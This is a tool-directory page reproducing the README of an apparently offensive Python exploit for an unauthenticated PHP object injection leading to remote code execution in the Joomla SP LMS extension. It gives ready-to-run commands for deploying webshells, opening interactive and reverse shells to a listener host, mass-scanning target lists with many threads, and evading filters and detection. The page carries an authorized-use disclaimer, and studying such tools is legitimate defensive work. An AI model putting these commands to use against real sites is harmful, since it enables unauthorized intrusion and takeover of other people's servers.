Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - Unauthenticated PHP Object Injection to RCE exploit for Joomla SP LMS extension versions <= 4.1.3. Exploits lmsOrders cookie deserialization to write webshell via Joomla FormattedtextLogger gadget chain. Includes interactive shell, path discovery, and cleanup. For authorized security testing only. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
Vulnerability AnalysisCode AnalysisExploitationShellcodeWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRed Teaming
Payload Development
Labs & Practice
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

View Repository
2152 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

About

CVE-2026-48909 - Unauthenticated PHP Object Injection to RCE exploit for Joomla SP LMS extension versions <= 4.1.3. Exploits lmsOrders cookie deserialization to write webshell via Joomla FormattedtextLogger gadget chain. Includes interactive shell, path discovery, and cleanup. For authorized security testing only.

Share

CVE-2026-48909

Joomla SP LMS — Unauthenticated PHP Object Injection → RCE

Python Version CVSS License Platform

Proof-of-concept assessment tool for CVE-2026-48909
Author: Sudeepa Wanigarathna

joomla1

[!IMPORTANT] Authorized use only. This tool is for security research, education, and testing systems you own or have explicit written permission to assess. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.


Table of Contents

  • Overview
  • Vulnerability Details
  • Features
  • Installation
  • Quick Start
  • Usage Guide
  • Command Reference
  • Payload Types
  • Attack Chain
  • Output Examples
  • Troubleshooting
  • Repository Layout
  • Version History
  • Disclaimer
  • Author

Overview

CVE-2026-48909 is a critical unauthenticated PHP Object Injection in the Joomla SP LMS extension. This tool implements the full attack chain so security professionals can validate impact in lab or authorized environments.

It covers detection, path discovery, payload delivery, interactive post-exploitation (where permitted), mass assessment, and optional cleanup.


Vulnerability Details

AttributeValue
CVE IDCVE-2026-48909
CVSS9.5 (Critical)
Attack VectorNetwork — unauthenticated
ImpactRemote Code Execution
Affected ProductJoomla SP LMS
Affected Versions1.0.0 – 4.1.3
Patched VersionSP LMS 4.1.4+
Gadget ChainRequires Joomla < 5.2.2

Compatibility Matrix

ComponentVersionRCE
SP LMS< 4.1.4Vulnerable
SP LMS≥ 4.1.4Patched
Joomla< 5.2.2Gadget chain usable
Joomla≥ 5.2.2Gadget chain patched

Features

Core

CapabilityDescription
Unauthenticated exploitNo credentials required
Multiple payloads7 webshell / execution variants
Interactive shellCommand history session after deploy
Path discoveryAutomatic writable path probing
CleanupRemove deployed webshell after tests

Assessment & Ops

CapabilityDescription
Mass scanningMulti-threaded target lists (1000+)
Proxy supportHTTP/SOCKS (Burp, ZAP, etc.)
Reverse shellListener-based payloads
Stealth modeHeader / POST-oriented command channels
RandomizationUUID shell names, User-Agent rotation
ReportingExport as JSON, HTML, or CSV
Detection assistsJoomla version checks, --check-only, --safe-mode

Evasion Notes

  • Avoids characters blocked by Joomla’s cmd filter where possible
  • Hex-encoded PHP write path to reduce base64 padding / slash issues
  • Configurable delays and rotating User-Agents
  • Retry logic across multiple injection / path candidates

Installation

Prerequisites

  • Python 3.6+
  • pip
  • Network reachability to target(s) under test

Setup

cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

Dependencies

requests>=2.31.0
urllib3>=2.0.0

argparse ships with the Python standard library; it does not need to be installed via pip.


Quick Start

Replace https://target.example with a lab or authorized target only.

Single target — discover path + interactive shell

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Safe checks (no exploitation)

python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

Mass scan

python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

Reverse shell (authorized lab)

# Listener
nc -lvnp 4444

# Exploit host
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

Usage Guide

Path discovery

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

Known writable path

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

Interactive session

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

One-shot command

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

Stealth payload + interactive

python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

Proxy (Burp / ZAP)

python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

Cleanup

python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

Target list format

https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

Command Reference

Target

ArgumentDescription
targetSingle target URL
--targets, -T FILEFile of targets (one URL per line)
--path PATHAbsolute server path for webshell
--shell-type TYPEminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMEWebshell filename (default: x.php)

Network

ArgumentDescription
--timeout SECONDSRequest timeout (default: 15)
--insecureSkip TLS certificate verification
--proxy URLe.g. http://127.0.0.1:8080
--random-uaRotate User-Agent (enabled by default)
--delay SECONDSDelay between requests

Reverse shell

ArgumentDescription
--reverse-host HOSTListener host
--reverse-port PORTListener port

Modes

ArgumentDescription
--interactive, -iInteractive shell after deploy
--check-onlyVulnerability check only
--safe-modeNon-destructive testing
--find-pathAuto-discover writable path
--cmd COMMANDRun one command and exit
--cleanup PATHRemove webshell at path
--cleanup-afterCleanup after exploitation

Mass scan / report

ArgumentDescription
--threads NUMWorker threads (default: 10)
--export FILEOutput path for results
--export-format FORMATjson, html, csv (default: json)

Logging

ArgumentDescription
--log-file FILEWrite logs to file
--quiet, -qQuiet mode
--verbose, -vVerbose output
--no-bannerHide banner

Payload Types

Download Tool